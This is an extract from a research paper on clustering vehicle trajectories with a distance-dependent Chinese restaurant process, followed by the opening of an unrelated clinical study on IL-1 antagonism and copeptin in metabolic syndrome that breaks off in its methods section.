follows: 1. For each trajectory, sample customer assignment Ci∼ddCRP(D,f ,τ) as explained in Eq. (2). 2. Drive table assignment from customer assignment. For each table, k, sample its parameter from the base distribution ϕk ∼G0 3. For each trajectory, independently draw Xi∼Mul(.|ϕzi) The decaying function, f (.), in Eq. (2) was defined as: f (d;γ;γ0)=exp(− d γ ). (3) With this function, the probability of linking two trajectories becomes smaller as their distance increases. The parameterγ controls how fast this probability decays with increasing distance. The inference of DDCRP requires drawing samples for all samples which have the possibility of being linked. Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 5/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.206 Inference The key problem that needs to be addressed is computing the posterior distribution of latent customer assignment conditioned on the bag-of-grid cell representation of trajectories X1:N . In our problem, the based distribution G0, is conjugate to the data generating distribution P(Xi|Zci,G0). Therefore, the cluster parameters ϕk can be analytically marginalised. After such a calculation, the posterior distribution is expressed by: P ( c1:N|X1:N,D,f ,τ,γ,γ0 ) ∝ N∏ i=1 P(ci|D,f ,τ,γ,γ0)P(X1:N|Z(c1:N )) (4) where Z(c1:N ) denotes the table assignment and P(X1:N|Z(c1:N )) is the likelihood function which can be expressed by Blei & Frazier (2011) P(X1:N|Z(c1:N))= |Z(c1:N )|∏ k=1 P(Xzk(C1:N )|Z(c1:N)) (5) with |Z(c1:N)| being the number of unique tables and zk(C1:N) denoting all customers assigned to table k. Due to the combinatorial sum in the denominator, the analytical solution of the posterior given by Eq. (4) is intractable. Instead of exact inference, collapsed Gibbs strategy (Blei & Frazier, 2011) is used to derive the posterior inference where the customer assignment is iteratively sampled from the following equation: P(ci|c−i,X1:N,D,f ,τ,γ,γ0)∝P(ci|D,f ,τ)×P(X1:N|z(ci∪c−i)) (6) where c−i denotes all customer assignments except for ci. The first term on the right side of the equation is DDCRP’s customer assignment discussed in Eq. (2), and the second term is the likelihood term given by Eq. (5). More details can be found in the Supplemental Material. RESULTS AND DISCUSSION The performance of the proposed approach was evaluated on the CROSS (Morris & Trivedi, 2011) and the Lankershim datasets (NGSIM: Next Generation Simulation, 2008). The CROSS dataset provides objects trajectories and their ground truth activities. The data are organized into train and test sets. There are 1,900 and 9,700 trajectories in the train and test sets respectively. Two hundred samples in the test set are labeled as abnormal activities. These samples were discarded in this study and we evaluated the proposed model on 9,500 trajectories in the test set with legal activities (Fig. 1). The Lankershim dataset is part of the Next Generation Simulation (NGSIM) program provided by the US Federal Highway Administration (FHWA). The dataset contains videos taken with overhead intersection cameras. The dataset also provided the trajectories of moving vehicles. Based on the time the videos are collected, the data are placed into 8:30 am to 8:45 am and 8:45 am to 9:00 am subsets. The trajectories took place near an intersection, and trajectories outside of this area were removed (see Fig. 2). The corresponding X and Y coordinate for this region were −80 < X < 80 and 300 < Y < 500 respectively. After Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 6/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.206#supplemental-information http://dx.doi.org/10.7717/peerj-cs.206#supplemental-information http://dx.doi.org/10.7717/peerj-cs.206 Figure 1 Vehicle trajectories in CROSS dataset. The colors of trajectories indicate the ground truth ac- tivity label. Full-size DOI: 10.7717/peerjcs.206/fig-1 filtering the trajectories having less than ten observations, a total of 2212 trajectories were obtained. Since this dataset does not provide activity labels for trajectories, the trajectories were manually labelled into 21 activities (19 legal activities, and two activities where agents took illegal maneuvers). The main parameter that needs to be set prior to experiments is the size of the grid cells. Theoretically, smaller grid cells produce a better result with the cost of requiring more data. Based on the performed experiments, the cell size was set for the CROSS to 40×25 and for the Lankershim into 10×10 pixels. These choices of cell size divide the CROSS and Lankershim into 9 by 19 and 16 by 20 equal sized grid cells respectively. Each raw trajectory was converted into bag-of-grid representation mentioned in the section of Trajectory Analysis with Distance Dependent CRP. The dimensions of bag-of-grids representations are Xi∈<1×171 and Xi∈<1×320 for CROSS and Lankershim datasets respectively. The correct clustering rate (CCR) is used to evaluate the clustering performance. The CCR has been used as evaluation criteria to verify trajectory clustering algorithms in several studies (Morris & Trivedi, 2009; Weiming et al., 2013; Zhang, Kaiqi & Tieniu, 2006). Given the ground truth set G and resulting clusters set C, corresponding cluster that maximizes Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 7/15 https://peerj.com https://doi.org/10.7717/peerjcs.206/fig-1 http://dx.doi.org/10.7717/peerj-cs.206 A B Figure 2 The Lankershim dataset: (A) area of interest, (B) vehicle trajectories in the interest area col- lected from 8:30 Am to 8:45 Am. Full-size DOI: 10.7717/peerjcs.206/fig-2 the number of matched labels is found. The CCR is defined as CCR= 1 N K∑ i=1 pi (7) where N is the number of trajectories, K is the number of clusters in the ground truth. Given the assignment between ground truth and estimated cluster labels, pi is computed as (Zhang, Kaiqi & Tieniu, 2006): pi= {∣∣ci∩gm∣∣; given ci∈C assigned to gm∈G 0; otherwise (8) The proposed method was compared with dual-HDP and three well-known distance measure methods, LCSS, DTW, and modified Hausdorff (MH). For each distance, four unsupervised clustering algorithms were used: K-mean clustering, spectral clustering, agglomerative clustering, and graph-based clustering. The average CCR of clustering algorithms for each distance method is reported in this study. One limitation of distance- based clustering techniques is that they require the number of clusters to be given to them. To show the effect of choosing the number of clustering on the performance the experiments were run with the different number of clusters, including the true value. The other parameters of competitor methods were set during the course of experiments to achieve their maximum accuracy. For the proposed methods, collapsed Gibbs was performed for 100 samples. After each sampling, CCR was evaluated based on the customer assignment result. Figure 3 shows CCR per sample for the Lankershim and CROSS datasets. Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 8/15 https://peerj.com https://doi.org/10.7717/peerjcs.206/fig-2 http://dx.doi.org/10.7717/peerj-cs.206 A B Figure 3 Clustering accuracy of (A) the CROSS dataset, (B) the Lankershim dataset. Full-size DOI: 10.7717/peerjcs.206/fig-3 Table 1 The CCR Performance of different methods for the CROSS Dataset. Number of Clusters 5 10 15 19 20 21 25 30 DTW 0.292 0.559 0.806 0.971 0.984 0.968 0.916 0.857 LCSS 0.291 0.555 0.805 0.986 0.971 0.952 0.864 0.792 MH 0.556 0.559 0.807 0.986 0.986 0.973 0.934 0.879 Dual HDP – – – – – 0.801 – – DDCRP (DTW) – – – 0.986 – – – – DDCRP (LCSS) – – – 0.993 – – – – DDCRP (MH) – – – 0.989 – – – – In all methods, CCR achieves greater than 0.9 after the 3rd sample. The average CCR is obtained by averaging the CCR values after neglecting the first ten samples. The results of trajectory clustering accuracy for the CROSS dataset are summarized in Table 1. The best correct clustering rate is obtained by DDCRP when using LCSS as a distance measure which produces 0.993. The average correct clustering rate of LCSS with traditional clustering algorithm is 0.986. While this value is slightly less than the performance produced by LCSS and DDCRP, it needs to be highlighted that traditional clustering techniques achieved 0.986 correct clustering rate with the assumption of knowing the true total number of clusters. Also, the proposed method improves the correct clustering rate regardless of which similarity method is used. In other words, using DTW and MH as similarity measure along with DDCRP achieve better average CCR compared to traditional clustering algorithms. Similarly, Table 2 summarizes the clustering accuracy for the Lankershim dataset. Using DDCRP along with MH distance produces the best correct clustering rate of 0.998. Same as CROSS dataset, the proposed method improves correct clustering rate regardless of which similarity measure is used. The most notable improvement is when DTW is used as Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 9/15 https://peerj.com https://doi.org/10.7717/peerjcs.206/fig-3 http://dx.doi.org/10.7717/peerj-cs.206 Table 2 The CCR Performance of different methods for the Lankershim dataset. Number of Clusters 5 10 15 18 19 20 25 30 DTW 0.453 0.705 0.901 0.864 0.868 0.864 0.828 0.789 LCSS 0.529 0.846 0.901 0.924 0.925 0.931 0.912 0.899 MH 0.488 0.840 0.973 0.985 0.977 0.974 0.937 0.902 Dual HDP – – – 0.974 – – – – DDCRP (DTW) – – – – 0.996 – – – DDCRP (LCSS) – – – – 0.996 – – – DDCRP (MH) – – – – 0.998 – – – A B Figure 4 Founded clusters: (A) the CROSS dataset by using the DDCRP and the LCSS distance meth- ods, (B) the Lankershim dataset by using the DDCRP and the MH distance methods. Full-size DOI: 10.7717/peerjcs.206/fig-4 a similarity measure. In this case, the average CCR for similarity-based clustering is 0.868 while the combination of DTW and DDCRP results in the CCR of 0.996. After removing clusters with single trajectory and ignoring the initial samples, methods based on DDCRP discovered 19 clusters for both the CROSS and the Lankershim datasets. Figure 4 shows the discovered clusters in the 100th sample for the CROSS and Lankershim datasets. The results shown in this figure are obtained by DDCRP using LCSS and MH distances for the CROSS and Lankershim respectively. The discovered clusters are typical activities in an intersection and include crossing the intersection, turning left, turning right, and u-turn. As discussed in the Trajectory Analysis with Distance Dependent CRP section, the size of the grid impacts the accuracy of any PTM-based trajectory analysis system. Another advantage of the proposed method compared to the Dual-HDP method is that it is less sensitive to the choice of grid size. This is due to the fact that most PTM models, including dual HDP, are based only on bag-of-grids representation of the trajectories. The proposed method, however, uses both bag-of-grids and pairwise distance between raw trajectories. Therefore, it can be expected that the proposed method is less sensitive to the choice of grid sizes. Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 10/15 https://peerj.com https://doi.org/10.7717/peerjcs.206/fig-4 http://dx.doi.org/10.7717/peerj-cs.206 A B Figure 5 The impact of grid size on the clustering accuracy: (A) the CROSS dataset, (B) the Lanker- shim dataset. Full-size DOI: 10.7717/peerjcs.206/fig-5 Figure 5 shows the average the CCR of the DDCRP and dual-HDP systems for different sizes of the grid. The grid size of 25×24 and 10×10 pixels produces 0.801 and 0.974 correct clustering rate for the dual-HDP method in the CROSS and Lankershim datasets respectively. However, the accuracy substantially decreases by increasing or decreasing the grid size. The proposed method, however, is more robust to the choice of grid size since the pairwise distance between trajectories is independent of the choice of grid size. The aim of trajectory path modelling is to discover the paths commonly taken by objects in each cluster. One benefit of our method is its ability to model the path simultaneous to trajectory clustering. In our study, each path is characterized by the distribution over grid cells in a scene. Each cell for a path can be associated to any number in the range of 0 to 1, where 0 are the cells that have no chance of being observed in that path. As the values of a cell are closer to 1, this cell become more essential for the path, and the probability of it being passed by trajectories belonging to that path increases. The path modelling experiments were conducted with the same parameter setup discussed earlier in this section. Figure 6 shows the cluster models for the CROSS and Lankershim datasets. The blue cells are less likely to be observed by trajectories in that cluster. Conversely, the red cells are more probably observed by trajectories. Then most paths have their probable grid cells in the middle of their route, while when moving further away to the edges of the routes, the probability of grid cells decreases. CONCLUSION This paper proposed an unsupervised approach for trajectory clustering and modelling. The generative process of trajectory analysis was modelled via a probabilistic model. The pairwise distances were used as prior in DDCRP to promoting similar trajectories to be clustered. The DDCRP were used to combine the advantages of similarity-based and PTM-based approaches. Compared to probabilistic topic approaches, our method is able to model the full path taken by agents in each cluster. Unlike most similarity-based methods, Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 11/15 https://peerj.com https://doi.org/10.7717/peerjcs.206/fig-5 http://dx.doi.org/10.7717/peerj-cs.206 A B Figure 6 Cluster models: (A) the CROSS dataset, (B) the Lankershim dataset. Full-size DOI: 10.7717/peerjcs.206/fig-6 our method drives the number of clusters automatically. The proposed trajectory analysis system clusters the trajectories and models the clusters’ paths at the same time. Specifically, raw trajectories were converted to bag-of-grid cells representation and considered each cluster with its distribution over the grids. Experimental results confirmed the effectiveness and usefulness of the proposed algorithm in trajectory clustering and modelling compared to other methods. The proposed approach is planned to have an online learning capability, where the cluster and path models keep updated as more data is observed. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Ministry of Education Malaysia by through a Research University Grant of University Technology Malaysia (UTM), project titled ‘‘Intelligent fault detection and diagnosing for process plant R.k430000.77434.4J010.’’ The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Ministry of Education Malaysia by through a Research University Grant of University Technology Malaysia (UTM). Competing Interests The authors declare there are no competing interests. Author Contributions • Reza Arfa, Rubiyah Yusof and Parvaneh Shabanzadeh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 12/15 https://peerj.com https://doi.org/10.7717/peerjcs.206/fig-6 http://dx.doi.org/10.7717/peerj-cs.206 computation work, authored or reviewed drafts of the paper, approved the final draft, the authors contributed equally to the completion of the manuscript. Data Availability The following information was supplied regarding data availability: The code is available at: https://github.com/rezaarfa/motionlearning and in the Supplemental Information. The CROSS dataset can be downloaded from http://cvrr.ucsd.edu/bmorris/datasets/ dataset_trajectory_analysis.html. The Lankershim is part of the NGSIM dataset and can be downloaded from https://ops.fhwa.dot.gov/trafficanalysistools/ngsim.htm. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.206#supplemental-information. REFERENCES Aköz Ö, Karsligil ME. 2014. Traffic event classificati on at intersections based on the severity of abnormality. Machine Vision and Applications 25:613–632 DOI 10.1007/s00138-011-0390-4. Atev S, Miller G, Papanikolopoulos NP. 2010. Clustering of vehicle trajecto- ries. IEEE Transactions on Intelligent Transportation Systems 11:647–657 DOI 10.1109/TITS.2010.2048101. Baldassano C, Beck DM, Li F-F. 2015. Parcellating connectivity in spatial maps. PeerJ 3:e784 DOI 10.7717/peerj.784. Blei DM, Frazier PI. 2011. Distance dependent Chinese restaurant processes. Journal of Machine Learning Research 12:2461–2488. Dee HM, Velastin SA. 2008. How close are we to solving the problem of automated visual surveillance? Machine Vision and Applications 19:329–343 DOI 10.1007/s00138-007-0077-z. Fox EB, Sudderth EB, Willsky AS. 2007. Hierarchical Dirichlet processes for tracking maneuvering targets. In: 2007 10th international conference on information fusion. IEEE, 1–8 DOI 10.1109/ICIF.2007.4408155. Gershman SJ, Blei DM. 2012. A tutorial on Bayesian nonparametric models. Journal of Mathematical Psychology 56:1–12 DOI 10.1016/j.jmp.2011.08.004. Ghosh S, Ungureanu AB, Sudderth EB, Blei DM. 2011. Spatial distance dependent Chinese restaurant processes for image segmentation. In: Proceedings of the 24th international conference on neural information processing systems. Granada, Spain: Curran Associates Inc., 1476–1484. Jeong H, Chang HJ, Choi JY. 2011. Modeling of moving object trajectory by spatio- temporal learning for abnormal behavior detection. In: Advanced Video and Signal- Based Surveillance (AVSS), 2011 8th IEEE international conference on. Piscataway: IEEE, 119–123 DOI 10.1109/AVSS.2011.6027305. Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 13/15 https://peerj.com https://github.com/rezaarfa/motionlearning http://dx.doi.org/10.7717/peerj-cs.206#supplemental-information http://cvrr.ucsd.edu/bmorris/datasets/dataset_trajectory_analysis.html http://cvrr.ucsd.edu/bmorris/datasets/dataset_trajectory_analysis.html https://ops.fhwa.dot.gov/trafficanalysistools/ngsim.htm http://dx.doi.org/10.7717/peerj-cs.206#supplemental-information http://dx.doi.org/10.7717/peerj-cs.206#supplemental-information http://dx.doi.org/10.1007/s00138-011-0390-4 http://dx.doi.org/10.1109/TITS.2010.2048101 http://dx.doi.org/10.7717/peerj.784 http://dx.doi.org/10.1007/s00138-007-0077-z http://dx.doi.org/10.1109/ICIF.2007.4408155 http://dx.doi.org/10.1016/j.jmp.2011.08.004 http://dx.doi.org/10.1109/AVSS.2011.6027305 http://dx.doi.org/10.7717/peerj-cs.206 Jonsen ID, Myers RA, Flemming JM. 2003. Meta-analysis of animal movement using state-space models. Ecology 84:3055–3063 DOI 10.1890/02-0670. Joseph J, Doshi-Velez F, Huang AS, Roy N. 2011. A Bayesian nonparametric approach to modeling motion patterns. Autonomous Robots 31:383–400 DOI 10.1007/s10514-011-9248-x. Keogh EJ, Pazzani MJ. 2000. Scaling up dynamic time warping for datamining applications. In: Proceedings of the sixth ACM SIGKDD international confer- ence on Knowledge discovery and data mining. New York: ACM, 285–289 DOI 10.1145/347090.347153. Lei S, Fan J, Zhongke S, Molina R, Katsaggelos AK. 2014. Toward dynamic scene un- derstanding by hierarchical motion pattern mining. IEEE Transactions on Intelligent Transportation Systems 15:1273–1285 DOI 10.1109/TITS.2014.2299403. Makris D, Ellis T. 2005. Learning semantic scene models from observing activity in visual surveillance. IEEE Transactions on Systems, Man, and Cybernetics, Part B (Cybernetics) 35:397–408 DOI 10.1109/TSMCB.2005.846652. Morris B, Trivedi M. 2009. Learning trajectory patterns by clustering: experimental stud- ies and comparative evaluation. In: IEEE conference on computer vision and pattern recognition, 2009. Piscataway: IEEE, 312–319 DOI 10.1109/CVPR.2009.5206559. Morris BT, Trivedi MM. 2011. Trajectory learning for activity understanding: unsuper- vised, multilevel, and long-term adaptive approach. IEEE Transactions on Pattern Analysis and Machine Intelligence 33:2287–2301 DOI 10.1109/TPAMI.2011.64. Ng AY, Jordan MI, Weiss Y. 2001. On spectral clustering: analysis and an algorithm. In: Proceedings of the 14th international conference on neural information processing systems: natural and synthetic. Vancouver, British Columbia, Canada: MIT Press, 849–856. NGSIM: Next Generation Simulation. 2008. In. 2008. Available at www.ngsim.fhwa.dot. gov: FHWA, U.S. Department of Transportation. Pao H-K, Fadlil J, Lin H-Y, Chen K-T. 2012. Trajectory analysis for user verification and recognition. Knowledge-Based Systems 34:81–90 DOI 10.1016/j.knosys.2012.03.008. Papadopoulos AN. 2008. Trajectory retrieval with latent semantic analysis. In: Proceed- ings of the 2008 ACM symposium on applied computing. New York: ACM, 1089–1094. Pitman J. 2002. Combinatorial stochastic processes. Technical Report 621. Available at https://www.stat.berkeley.edu/~pitman/621.pdf . Reed M, Johansen Ø, Brandvik PJ, Daling P, Lewis A, Fiocco R, Mackay D, Prentki R. 1999. Oil spill modeling towards the close of the 20th century: overview of the state of the art. Spill Science & Technology Bulletin 5:3–16 DOI 10.1016/S1353-2561(98)00029-2. Ren Q, Wang Q, Zhang J, Chen S. 2016. Unordered images selection for dense 3D re- construction based on distance dependent Chinese restaurant process. In: Intelligent Control and Automation (WCICA), 2016 12th world congress on. IEEE, 2969–2973 DOI 10.1109/WCICA.2016.757842. Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 14/15 https://peerj.com http://dx.doi.org/10.1890/02-0670 http://dx.doi.org/10.1007/s10514-011-9248-x http://dx.doi.org/10.1145/347090.347153 http://dx.doi.org/10.1109/TITS.2014.2299403 http://dx.doi.org/10.1109/TSMCB.2005.846652 http://dx.doi.org/10.1109/CVPR.2009.5206559 http://dx.doi.org/10.1109/TPAMI.2011.64 www.ngsim.fhwa.dot.gov www.ngsim.fhwa.dot.gov http://dx.doi.org/10.1016/j.knosys.2012.03.008 https://www.stat.berkeley.edu/~pitman/621.pdf http://dx.doi.org/10.1016/S1353-2561(98)00029-2 http://dx.doi.org/10.1109/WCICA.2016.757842 http://dx.doi.org/10.7717/peerj-cs.206 Tian B, Morris BT, Tang M, Liu Y, Yao Y, Gou C, Shen D, Tang S. 2017. Hierarchical and networked vehicle surveillance in its: a survey. IEEE Transactions on Intelligent Transportation Systems 18:25–48 DOI 10.1109/TITS.2016.2552778. Vlachos M, Kollios G, Gunopulos D. 2002. Discovering similar multidimensional trajectories. In: 18th international conference on data engineering, 2002. Piscataway: IEEE, 673–684 DOI 10.1109/ICDE.2002.994784. Wang X, Ma KT, Ng G-W, Grimson WEL. 2011. Trajectory analysis and semantic region modeling using nonparametric hierarchical bayesian models. International Journal of Computer Vision 95:287–312 DOI 10.1007/s11263-011-0459-6. Weiming H, Xi L, Guodong T, Maybank S, Zhongfei Z. 2013. An incremental DPMM-based method for trajectory clustering, modeling, and retrieval. IEEE Transactions on Pattern Analysis and Machine Intelligence 35:1051–1065 DOI 10.1109/TPAMI.2012.188. Weiming H, Xuejuan X, Zhouyu F, Xie D, Tieniu T, Maybank S. 2006. A system for learning statistical motion patterns. IEEE Transactions on Pattern Analysis and Machine Intelligence 28:1450–1464 DOI 10.1109/TPAMI.2006.176. Xi L, Weiming H, Wei H. 2006. A coarse-to-fine strategy for vehicle motion trajectory clustering. In: 18th international conference on pattern recognition, 2006. 591–594 DOI 10.1109/ICPR.2006.45. Yiwen W, Tze IY, Keathly D, Buckles B. 2014. Dynamic scene modelling and anomaly detection based on trajectory analysis. IET Intelligent Transport Systems 8:526–533 DOI 10.1049/iet-its.2012.0119. Zhang T, Lu H, Li SZ. 2009. Learning semantic scene models by object classification and trajectory clustering. In: 2009 IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 1940–1947 DOI 10.1109/CVPR.2009.5206809. Zhang Z, Kaiqi H, Tieniu T. 2006. Comparison of similarity measures for trajectory clustering in outdoor surveillance scenes. In: 18th international conference on pattern recognition, 2006. 1135–1138 DOI 10.1109/ICPR.2006.392. Arfa et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.206 15/15 https://peerj.com http://dx.doi.org/10.1109/TITS.2016.2552778 http://dx.doi.org/10.1109/ICDE.2002.994784 http://dx.doi.org/10.1007/s11263-011-0459-6 http://dx.doi.org/10.1109/TPAMI.2012.188 http://dx.doi.org/10.1109/TPAMI.2006.176 http://dx.doi.org/10.1109/ICPR.2006.45 http://dx.doi.org/10.1049/iet-its.2012.0119 http://dx.doi.org/10.1109/CVPR.2009.5206809 http://dx.doi.org/10.1109/ICPR.2006.392 http://dx.doi.org/10.7717/peerj-cs.206 work_lbjz23isnfbh5bcl4jbmahp6r4 ---- 9:7 715–723M Popovic et al. The role of IL-1 in the regulation of copeptin RESEARCH The role of IL-1 in the regulation of copeptin in patients with metabolic syndrome Milica Popovic1,2, Fahim Ebrahimi1,2, Sandrine Andrea Urwyler1,2, Marc Yves Donath1,3 and Mirjam Christ-Crain1,2 1Department of Endocrinology, Diabetology and Metabolism, University Hospital Basel, Basel, Switzerland 2Department of Clinical Research, University of Basel and University Hospital Basel, Basel, Switzerland 3Department of Biomedicine, University of Basel, Basel, Switzerland Correspondence should be addressed to M Christ-Crain: mirjam.christ-crain@usb.ch Abstract Arginine vasopressin (AVP) was suggested to contribute to cardiovascular risk and type 2 diabetes in patients with metabolic syndrome. The proinflammatory cytokine interleukin (IL)-1 is able to induce AVP secretion and plays a causal role in cardiovascular mortality and type 2 diabetes. We investigated in two studies whether copeptin levels – the surrogate marker for AVP – are regulated by IL-1-mediated chronic inflammation in patients with metabolic syndrome. Study A was a prospective, interventional, single-arm study (2014–2016). Study B was a randomized, placebo-controlled, double-blind study (2016–2017). n = 73 (Study A) and n = 66 (Study B) adult patients with metabolic syndrome were treated with 100 mg anakinra or placebo (only in study B) twice daily for 1 day (study A) and 28 days (study B). Fasting blood samples were drawn at day 1, 7, and 28 of treatment for measurement of serum copeptin. Patients with chronic low-grade inflammation (C-reactive protein levels ≥2 mg/L) and BMI >35 kg/m2 had higher baseline copeptin levels (7.7 (IQR 4.9–11.9) vs 5.8 (IQR 3.9–9.3) pmol/L, Pinflamm = 0.009; 7.8 (IQR 5.4–11.7) vs 4.9 (IQR 3.7–9.8) pmol/L, PBMI = 0.008). Copeptin levels did not change either in the anakinra or in the placebo group and remained stable throughout the treatment (P = 0.44). Subgroup analyses did not reveal effect modifications. Therefore, we conclude that, although IL-1-mediated inflammation is associated with increased circulating copeptin levels, antagonizing IL-1 does not significantly alter copeptin levels in patients with metabolic syndrome. Introduction Patients with metabolic syndrome are at significant risk for developing type 2 diabetes mellitus and cardiovascular diseases (1). Arginine vasopressin (AVP) was suggested to play a causal role in the development of type 2 diabetes mellitus and cardiovascular disease (2). Indeed, several studies have demonstrated that copeptin – the C-terminal part of the AVP precursor and surrogate marker for AVP (3) – predicts insulin resistance and onset of type 2 diabetes mellitus (4, 5, 6, 7, 8, 9, 10) and is associated with an increased cardiovascular mortality in patients with metabolic syndrome (5, 11, 12, 13). There are several potential pathways by which AVP might mediate cardiovascular risk and type 2 diabetes. First, AVP leads to an amplification of cortisol release by inhibiting negative feedback on adrenocorticotropic hormone secretion from the anterior pituitary gland and by direct stimulation of the adrenal cortex (14, 15). Moreover, AVP induces epinephrine secretion by stimulation of the chromaffin cells in the adrenal medulla (16) and stimulates glycogenolysis and gluconeogenesis via V1a receptors in the liver (17). Furthermore, AVP has antilipolytic (18) and prothrombotic (19) effects and mediates coronary vasoconstriction through vasopressin 1a receptors (20). The mechanisms underlying the upregulation of AVP/ copeptin levels in patients with metabolic syndrome are unknown. Interestingly, copeptin seems to be strongly -20-0197 Key Words f metabolic syndrome f copeptin f arginine vasopressin f interleukin-1 f low-grade inflammation Endocrine Connections (2020) 9, 715–723 ID: 20-0197 9 7 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access mailto:mirjam.christ-crain@usb.ch https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 716 PB–XX 9:7 associated with elevated levels of C-reactive protein (CRP) (8, 21, 22, 23). Elevated CRP levels in patients with metabolic syndrome result from a chronic activation of the IL-1 system, a key cytokine stimulated by metabolic stress (24). Chronic low-grade inflammation enacted through IL-1 activity was recently shown to play a causal role in the development of both type 2 diabetes mellitus and cardiovascular disease. Randomized treatment with IL-1 antagonists has proven capacity to reduce HbA1c levels in patients with type 2 diabetes mellitus and to reduce cardiovascular mortality in patients with coronary heart disease and elevated levels of CRP (25, 26). Interestingly, there seems to be an interplay between IL-1 and AVP, since animal experiments have shown induction of AVP secretion in response to IL-1 application (27, 28, 29), although there is conflicting data in a rat model of sepsis (30). We, therefore, hypothesize that the increased levels of copeptin observed in patients with metabolic syndrome are caused by an overactivity of IL-1 and that antagonism of the IL-1 pathway would lead to a reduction of copeptin levels. In this study, we report the results of two interventional trials investigating effects of IL-1 antagonism in obese individuals with metabolic syndrome. Methods This is a preplanned secondary analysis of two interventional trials (31, 32). Both trials were conducted according to the ethical guidelines of the Declaration of Helsinki and the applicable International Conference on Harmonization (ICH) guidelines on good clinical practice. Both trials were approved by the Ethics Committee Northwest and Central Switzerland (EKNZ) and Swissmedic and were registered on ClinicalTrials.gov (NCT00757276, NCT02672592). All patients provided written informed consent. Patients were recruited at two tertiary care centers in Switzerland (University Hospital Basel and Kantonsspital Aarau). Study A: Patients and trial design Study A was a prospective, open-labeled, interventional trial investigating short-term (=1 day) effects of IL-1 receptor antagonism in 73 obese patients with metabolic syndrome. Detailed study procedures have been published previously (32). Briefly, inclusion criteria were age between 18 and 80 years, body-mass index (BMI) >30 kg/m2 and at least one of the following additional features of the metabolic syndrome: Hyperglycemia (HbA1c >5.7%), hypertension (blood pressure (BP) >130/85 mmHg or BP lowering therapy), or dyslipidemia (HDL-C <1.0 mmol/L or triglycerides >1.7 mmol/L or low-density-lipoprotein- cholesterol (LDL-C) >3.4 mmol/L or lipid lowering treatment). Main exclusion criteria were concurrent medication with glucocorticoids, known Cushing’s syndrome, an underlying chronic inflammatory disease, history of a severe infection within the previous 2 months or a current infection, severe comorbidities and pregnancy or breastfeeding. After the screening visit, all patients received three s.c. injections of the recombinant human interleukin-1-receptor antagonist anakinra/Kineret® 100 mg within 2 days. The consecutive injections were started at 20:00 h and continued in a time interval of 12 h. The study-visits assessed in this analysis were ‘Baseline’ (=’Day 0’) and after three injections of the IL-1 antagonist anakinra/Kineret® (=’Day 1’). Study visits were scheduled in the morning between 07:30 h and 10:00 h after an overnight fast and blood samples were drawn at both visits. Study B: Patients and trial design Study B was a randomized, placebo-controlled, double- blind, interventional trial investigating short- as well as long-term effects of IL-1 receptor antagonism in 67 patients. A detailed description of study procedures was published previously (31). Main eligibility criteria were similar to study A. As study B was primarily designed to investigate the effect of IL-1 antagonism on testosterone levels in obese men with low levels of testosterone, all patients were male, aged 18 to 75 years with a BMI >30 kg/m2 and total testosterone levels <12 nmol/L. Patients were randomized 1:1 to receive either anakinra/Kineret® 100 mg or placebo as s.c. injection twice daily in a time interval of 12 h. Study visits were scheduled in the morning at baseline (day 0), at day 1 (short-term visit), at day 7 and at 4 weeks. Blood samples were drawn at every visit. Therefore, patients were instructed not to eat or drink after midnight before the study visits in both studies. Laboratory analyses Routine laboratory parameters, that is, total cholesterol, HDL cholesterol, HbA1c, and triglyceride levels, This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 7179:7 were analyzed at the local laboratories of the participating centers. At the University Hospital Basel, all routine parameters were measured on the Cobas 8000 c502 (Roche). At the Kantonsspital Aarau, total and HDL cholesterol were measured by immunoassay on the Architect i2000SR (Abbott), and HbA1c analysis was performed with the D-100 testing systems by BIORAD. In both centers, LDL cholesterol levels were calculated using the Friedewald formula (33). CRP was determined with an immunoturbidimetric assay (Tina-quant C-Reactive Protein Gen. 3 Test; Roche Diagnostics GmbH). Plasma copeptin levels were measured with a commercial automated immunofluorescence assay (B.R.A.H.M.S Copeptin-proAVP KRYPTOR, BRAHMS GmbH, part of Thermo Fisher Scientific) in a batch analysis. For this, EDTA blood samples were centrifuged at 4 °C and stored at −76 °C. Statistical analysis Copeptin values were log-transformed in order to achieve a distribution analog to normal distribution. Thereby, one patient had to be excluded due to an extreme value at baseline of 129 pmol/L, resulting in n = 66 patients for Study B. Unless stated otherwise, categorical variables are expressed as count (percentage) and continuous variables as means (±s.d.). In a first analysis, we aimed to investigate which parameters are associated with higher copeptin levels at baseline. Therefore, linear regression models were calculated with log-transformed copeptin as dependent variable and the respective parameter 